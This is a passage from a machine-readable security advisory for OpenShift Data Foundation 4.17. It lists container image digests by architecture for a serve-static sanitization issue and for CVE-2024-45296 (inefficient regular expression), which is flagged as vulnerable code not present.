"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", 